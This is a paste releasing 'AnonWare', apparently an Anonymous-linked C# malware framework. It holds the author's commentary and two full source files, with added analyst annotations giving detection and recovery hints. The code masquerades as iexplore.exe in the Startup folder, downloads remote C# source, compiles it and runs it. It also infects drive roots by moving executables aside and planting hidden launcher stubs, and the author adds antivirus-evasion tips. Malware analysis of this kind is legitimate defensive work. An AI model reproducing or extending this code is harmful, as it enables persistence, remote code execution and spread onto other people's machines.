AnonWare 1.0 RELEASE: http://pastebin.com/5f4C79VA UPDATE: GITHUB REPO AVAILABLE NOW! https://github.com/opendeveloper/anonware (^)_(^) TO SET THE RECORD STRAIGHT: as for allegations that my code is 'amateurish, lazy, etc.' i would like to say that it's completely true :) the code provided here *IS* just a C# compiler (with a little extra) and shouldn't be taken as some kind of super awesome virus released by a group of Anonymous hackers. it's something me, a bad programmer, threw together in a couple hours and decided to paste on pastebin. oh, and for the record, i was a little high, and, retrospectively, the comments were definitely over-optimistic. and when the reporter from the tech herald contacted me, i assumed that he was a developer, and he took interest in the code. i naturally was like, well i guess it is pretty cool...and let my ego get ahead of me. i would like to formally apologize to fellow Anonymous members for providing such a simple framework and then acting inappropriately like it was an awesome new idea. as for encryption/obfuscation: encryption/obfuscation was something i was assuming the devs could add to the framework; i didn't think it would be something i should put in the framework. besides; if i put a specific kind of obfuscation/encryption into the framework as it was, it would be pretty easy for the a/v vendors to just find a flaw in one part of my encryption code and then use that to exploit all future editions of it. that doesn't align well with what the 'framework' is, more of like the standard stuff so you can add on your own stuff so that a/v doesn't have one standard thing to go off. UPDATE: we now have encryption ^_^ check out our github repo for more info. as for existing malware frameworks: once again, a little high, way too optimistic comments ^^_^^ as for the existing malware frameworks pointed out, all of them are either pay-to-use or really hard to find the source for.
i provided AnonWare as a service that's simple to find and easy to modify for the future: i will release the FIRST version of AnonWare a couple days after #RefRef is released. hopefully, it will include encryption/obfuscation, a separate edition for people that want to create rogue AV and other software. i have an idea for using it with #RefRef, and will get everything ready for integration with #RefRef while we wait for the #RefRef team to complete development. i emphasize FIRST because it seems some people misunderstood the point of AnonWare...it was counterintuitive for the Sophos researcher to provide malware detection for it since what is provided here is nowhere near completed malware. also the tech herald reporter may have misunderstood, partially by sending the code to the researchers. i'm not blaming anyone for this; i acted like it was bigger than it was, and as a result reporters and the public may have been disappointed when reading thru the code. finally, please help AnonWare :P if you can do any type of development, i would love it if you could help improve the code, translate the code, etc. ty. tyvm. NOW BACK TO THE REST OF THE PASTE!
note - keep in mind that this is nowhere near a completed virus, just sumthing i threw together in a day ^_^ if you would like to use this at all, you're gonna need to add a lot to the code...it's just the absolute simplest parts of malware
///(update: no longer accepting code improvements :( will post updated code when i create it)
///(update#2: nvrm, gonna post it on github and let ppl play arnd with it)
///kthx

Program.cs contents:

// NOTE(review): analyst annotations are the comments marked "NOTE(review)"; every other comment is the
// original author's. This file shows two behaviours: (1) Main copies the running image into the
// per-user Startup folder under the name iexplore.exe, and (2) compile() fetches C# source text from a
// hard-coded HTTP URL, compiles it with CodeDom and starts the resulting executable.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using Microsoft.CSharp;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Management;
using System.Threading;
using System.CodeDom.Compiler;
using System.Net;
using System.IO;

namespace AnonWare_CSharp
{
    class Program
    {
        // NOTE(review): Entry point. As shown on this page it performs only the Startup-folder copy;
        // no call to compile() is visible from here.
        // NOTE(review): Detection - a PE file named iexplore.exe under
        // %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup is a masquerading indicator: the
        // Startup folder normally holds shortcuts, and the genuine Internet Explorer binary is installed
        // under Program Files, not in a user profile. File-creation monitoring on the Startup folder and
        // name/path mismatch rules both cover this step.
        static void Main()
        {
            // NOTE(review): reads %APPDATA% of the current user, so the copy needs no elevation.
            string appdatapath = Environment.GetEnvironmentVariable("appdata").ToString();
            //when it starts, app checks whether or not it's set to run on startup
            if (File.Exists(appdatapath + @"\Microsoft\Windows\Start Menu\Programs\Startup\iexplore.exe")) //we're using iexplore.exe as our fake identity :P check in Properties -> assembly name 2 change it. keep in mind that XP might have a different startup folder than then Win 7 and Vista. this is the path for 7 and vista startup folder
            {
            }
            else
            {
                //if it isn't, do this
                // NOTE(review): the source path is the AppDomain friendly name, i.e. a bare file name
                // resolved against the current working directory.
                File.Copy(AppDomain.CurrentDomain.FriendlyName.ToString(), appdatapath + @"\Microsoft\Windows\Start Menu\Programs\Startup\iexplore.exe");
            }
        }

        // NOTE(review): last source text that compile() fetched; used to skip recompiling unchanged text.
        public static string watsdasource;

        // NOTE(review): Downloads text from a hard-coded URL, and if it differs from the previously
        // fetched text, compiles it as C# into "assemble.exe" and starts that file.
        // NOTE(review): Detection - outbound plain-HTTP GET for a text file followed by compiler
        // activity from a non-developer process. On .NET Framework, CodeDom compilation normally runs
        // csc.exe as a child process and leaves temporary source/command-line files - confirm against
        // your own telemetry. A process start of a freshly written "assemble.exe" follows.
        // NOTE(review): Mitigation - application control that blocks unsigned executables launched from
        // user-writable paths stops the last step regardless of how the binary was produced.
        static void compile()
        {
            //we're using runtime compilation instead of just downloading an exe to go around the whole program is not signed by msft shit
            try
            {
                CSharpCodeProvider myCodeProvider = new CSharpCodeProvider();
                ICodeCompiler myCodeCompiler = myCodeProvider.CreateCompiler();
                String[] referenceAssemblies = { "System.dll" }; //if you plan to do more than really simple stuff with it, add stuff to this list (seperate them with commas)
                string myAssemblyName = "assemble.exe";
                CompilerParameters myCompilerParameters = new CompilerParameters(referenceAssemblies, myAssemblyName);
                myCompilerParameters.GenerateExecutable = true;
                myCompilerParameters.GenerateInMemory = true;
                WebClient x = new WebClient();
                // NOTE(review): the URL below is the author's placeholder, not an observed indicator.
                Stream y = x.OpenRead("http://sumsite.com/sumfile.txt"); //link to txt file containing source code (nothing matters except that it's a text file, name it anything you want)
                StreamReader z = new StreamReader(y);
                string source = z.ReadToEnd();
                if (source != watsdasource)
                {
                    watsdasource = source;
                    z.Close();
                    y.Close();
                    CompilerResults compres = myCodeCompiler.CompileAssemblyFromSource(myCompilerParameters, source);
                    // NOTE(review): relative file name; compres is never inspected before the start.
                    Process.Start("assemble.exe"); //for AV purposes, it's recommended that you change the name of this, or even make the name self-creating (see 'for all your randomness needs' below) ^_^
                }
                else
                {
                    z.Close();
                    y.Close();
                }
            }
            catch
            {
                //uh oh...
                // NOTE(review): every exception is swallowed, so failures of the download, compile or
                // start leave no application-level error trace.
            }
        }

        //for all your randomness needs! ^_^
        // NOTE(review): Builds a 10-character token: 4 lowercase letters, a number from
        // Random.Next(1000, 9999), then 2 uppercase letters. For hunting, names produced by this helper
        // match the shape [a-z]{4}[0-9]{4}[A-Z]{2}.
        public static string GetPassword()
        {
            StringBuilder builder = new StringBuilder();
            builder.Append(RandomString(4, true));
            builder.Append(RandomNumber(1000, 9999));
            builder.Append(RandomString(2, false));
            return builder.ToString();
        }

        // NOTE(review): returns random.Next(min, max) from a newly constructed System.Random
        // (non-cryptographic generator).
        private static int RandomNumber(int min, int max)
        {
            Random random = new Random();
            return random.Next(min, max);
        }

        // NOTE(review): returns `size` characters drawn from code points 65..90 ('A'..'Z'), lowercased
        // when lowerCase is true.
        private static string RandomString(int size, bool lowerCase)
        {
            StringBuilder builder = new StringBuilder();
            Random random = new Random();
            char ch;
            for (int i = 0; i < size; i++)
            {
                ch = Convert.ToChar(Convert.ToInt32(Math.Floor(26 * random.NextDouble() + 65)));
                builder.Append(ch);
            }
            if (lowerCase)
                return builder.ToString().ToLower();
            return builder.ToString();
        }
    }
}

reproduction.cs contents:

///reproduction.cs contains some nice, but still not near finished, code that turns AnonWare into a virus ^_^
///check thru psuedocode for more info :P
///TODO:
///intercept exe files before they're uploaded, compressed, or downloaded.
///instead of using a fake directory, actually copy the exe into the new wrapper ^^_^^
///spread thru la world!
// NOTE(review): analyst annotations are the comments marked "NOTE(review)". This file shows
// self-copying under a generated name and replacement of executables on a fixed list of drive letters
// with a compiled launcher stub. Relevant controls: block or restrict execution from removable media,
// application allow-listing, and alerting on executables on removable drives being replaced.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using Microsoft.CSharp;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Management;
using System.Threading;
using System.CodeDom.Compiler;
using System.Net;
using System.IO;

namespace AnonWare_CSharp
{
    class reproduction
    {
        // NOTE(review): Stores a generated "<token>.exe" name in the application settings, saves the
        // settings, then copies the running image to that relative file name (resolved against the
        // current working directory). The local `fname` is assigned but not used.
        public void reproduce()
        {
            Properties.Settings.Default.filename = GetPassword() + ".exe";
            Properties.Settings.Default.Save();
            string fname = Properties.Settings.Default.filename;
            File.Copy(AppDomain.CurrentDomain.FriendlyName.ToString(), Properties.Settings.Default.filename);
        }

        // NOTE(review): Checks the drive roots F:, G:, H:, I:, J:, Z: and D: in that order. A root is
        // passed to INJECT when it exists and GetDirectorySize reports more than 0 and fewer than
        // 20,000,000 bytes of top-level *.exe files. The `&` operator is non-short-circuit, so
        // GetDirectorySize runs twice per existing root.
        // NOTE(review): Detection - one process enumerating *.exe on several drive roots in sequence.
        public void usbinject()
        {
            ///
            ///foreach [program] x in [directory] y
            ///{
            ///MOVE PROGRAMS INTO GetPassword including the CHILD
            ///CREATE COMPILER
            ///string source = "yadayda" + GetPassword\filename.exe + "moaryada" + GetPassword\Settings.Default.filename + "even MOAR yadyada";
            ///COMPILE & PLACE IN PLACE OF ORIGINAL EXE
            ///}
            ///
            //this could really be improved...
            if(Directory.Exists(@"F:\"))
            {
                if (GetDirectorySize(@"F:\") < 20000000.00 & GetDirectorySize(@"F:\") != 0) //i *think* that means 20 MB... it would really sux if it meant 20 GB or 20 KB xD
                {
                    INJECT(@"F:\");
                }
            }
            if (Directory.Exists(@"G:\"))
            {
                if (GetDirectorySize(@"G:\") < 20000000.00 & GetDirectorySize(@"G:\") != 0)
                {
                    INJECT(@"G:\");
                }
            }
            if (Directory.Exists(@"H:\"))
            {
                if (GetDirectorySize(@"H:\") < 20000000.00 & GetDirectorySize(@"H:\") != 0)
                {
                    INJECT(@"H:\");
                }
            }
            if (Directory.Exists(@"I:\"))
            {
                if (GetDirectorySize(@"I:\") < 20000000.00 & GetDirectorySize(@"I:\") != 0)
                {
                    INJECT(@"I:\");
                }
            }
            if (Directory.Exists(@"J:\"))
            {
                if (GetDirectorySize(@"J:\") < 20000000.00 & GetDirectorySize(@"J:\") != 0)
                {
                    INJECT(@"J:\");
                }
            }
            if (Directory.Exists(@"Z:\"))
            {
                if (GetDirectorySize(@"Z:\") < 20000000.00 & GetDirectorySize(@"Z:\") != 0)
                {
                    INJECT(@"Z:\");
                }
            }
            if (Directory.Exists(@"D:\"))
            {
                if (GetDirectorySize(@"D:\") < 20000000.00 & GetDirectorySize(@"D:\") != 0)
                {
                    INJECT(@"D:\");
                }
            }
        }

        // NOTE(review): For the given root: creates a directory named with a GetPassword() token,
        // copies the file named in Settings.filename into it twice (once as "<name>anonwr.exe", once
        // under its own name), then for each top-level *.exe moves the original into that directory
        // under a new token name and compiles a stub to the original path. The stub source starts two
        // hidden `cmd /C` processes: one for the moved original, one for the "anonwr.exe" copy.
        // NOTE(review): Artefacts to hunt for on an affected drive - a root-level directory whose name
        // matches [a-z]{4}[0-9]{4}[A-Z]{2}; a file ending in "anonwr.exe" inside it; executables in the
        // root replaced by small .NET assemblies whose namespace is "anonwarebooter"; cmd.exe children
        // started with a hidden window by those stubs. Recovery: the original executables are moved,
        // not deleted, so they are still present in the token-named directory under new names.
        private void INJECT(string directorytoinject)
        {
            try
            {
                string[] directorys = Directory.GetDirectories(directorytoinject);
                foreach (string dr in directorys)
                {
                    // NOTE(review): looks for an "info.aw" marker; the branch body is empty, so the
                    // result has no effect in the code shown.
                    if (File.Exists(dr + "info.aw"))
                    {
                        //It's ALIVE!
                    }
                }
                string[] a = Directory.GetFiles(directorytoinject, "*.exe");
                string direct = directorytoinject + GetPassword();
                Directory.CreateDirectory(direct);
                string[] new1 = Properties.Settings.Default.filename.Split('.');
                string de1 = direct + @"\" + new1[0] + "anonwr.exe";
                File.Copy(Properties.Settings.Default.filename, de1);
                File.Copy(Properties.Settings.Default.filename, direct + @"\" + Properties.Settings.Default.filename);
                foreach (string nm in a)
                {
                    string newName = GetPassword() + ".exe";
                    string Direct = direct + @"\" + newName;
                    File.Move(nm, Direct);
                    CSharpCodeProvider myCodeProvider = new CSharpCodeProvider();
                    ICodeCompiler myCodeCompiler = myCodeProvider.CreateCompiler();
                    String[] referenceAssemblies = { "System.dll" };
                    // NOTE(review): output assembly path is the original file's path, so the compiled
                    // stub takes the place of the executable that was just moved away.
                    string myAssemblyName = nm;
                    CompilerParameters myCompilerParameters = new CompilerParameters(referenceAssemblies, myAssemblyName);
                    myCompilerParameters.GenerateExecutable = true;
                    myCompilerParameters.GenerateInMemory = false;
                    string direct2 = direct + "\\" + Properties.Settings.Default.filename;
                    // NOTE(review): stub source is built by string concatenation with the two paths
                    // embedded as literals; direct2 above is computed but not used in it.
                    string source = "using System; using System.Diagnostics; namespace anonwarebooter { class Program { static void Main(string[] args) { try { Process cmd = new Process(); string ags = \"/C " + Direct.Replace("\\", "\\\\") + "\"; cmd.StartInfo.FileName = \"cmd\"; cmd.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; cmd.StartInfo.Arguments = ags; cmd.Start(); Process cmd2 = new Process(); string ags2 = \"/C " + de1.Replace("\\", "\\\\") + "\"; cmd2.StartInfo.FileName = \"cmd\"; cmd2.StartInfo.Arguments = ags2; cmd2.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; cmd2.Start(); } catch { } } } }";
                    CompilerResults compres = myCodeCompiler.CompileAssemblyFromSource(myCompilerParameters, source);
                }
            }
            catch
            {
                // NOTE(review): all exceptions are swallowed; a failure part-way through can leave
                // originals moved without a stub written in their place.
            }
        }

        // NOTE(review): Returns the summed length in bytes of the *.exe files directly inside `p`
        // (no recursion into subdirectories, other file types ignored).
        static long GetDirectorySize(string p)
        {
            // 1
            // Get array of all file names.
            string[] a = Directory.GetFiles(p, "*.exe");
            // 2
            // Calculate total bytes of all files in a loop.
            long b = 0;
            foreach (string name in a)
            {
                // 3
                // Use FileInfo to get length of each file.
                FileInfo info = new FileInfo(name);
                b += info.Length;
            }
            // 4
            // Return total size
            return b;
        }

        // NOTE(review): Instance copy of the token generator in Program.cs: 4 lowercase letters, a
        // number from Random.Next(1000, 9999), then 2 uppercase letters.
        public string GetPassword()
        {
            StringBuilder builder = new StringBuilder();
            builder.Append(RandomString(4, true));
            builder.Append(RandomNumber(1000, 9999));
            builder.Append(RandomString(2, false));
            return builder.ToString();
        }

        // NOTE(review): returns random.Next(min, max) from a newly constructed System.Random.
        private int RandomNumber(int min, int max)
        {
            Random random = new Random();
            return random.Next(min, max);
        }

        // NOTE(review): returns `size` characters drawn from 'A'..'Z', lowercased when lowerCase is true.
        private string RandomString(int size, bool lowerCase)
        {
            StringBuilder builder = new StringBuilder();
            Random random = new Random();
            char ch;
            for (int i = 0; i < size; i++)
            {
                ch = Convert.ToChar(Convert.ToInt32(Math.Floor(26 * random.NextDouble() + 65)));
                builder.Append(ch);
            }
            if (lowerCase)
                return builder.ToString().ToLower();
            return builder.ToString();
        }
    }
}